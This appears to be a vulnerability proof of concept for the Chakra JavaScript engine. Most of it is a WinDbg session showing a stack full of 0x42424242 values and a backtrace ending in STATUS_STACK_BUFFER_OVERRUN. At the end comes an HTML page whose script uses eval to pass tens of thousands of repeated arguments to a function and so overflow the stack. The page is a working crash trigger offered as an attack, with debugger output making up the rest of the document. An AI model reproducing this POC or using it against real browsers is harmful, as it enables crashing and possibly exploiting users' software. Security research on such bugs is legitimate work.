00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 0:016> g STATUS_STACK_BUFFER_OVERRUN encountered (1590.b70): Break instruction exception - code 80000003 (first chance) KERNELBASE!UnhandledExceptionFilter+0x85960: 00007ffe`9e61c120 cc int 3 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960 00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a 00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169 00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38 00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd 00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368 00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 --> <html> <head> <title> POC </title> </head> <script> var a = '0x42424242,'.repeat(0xFFFF-2); var b = "function Car(){} var car = new Car(a,"+a+"a);"; eval(b); </script> </html>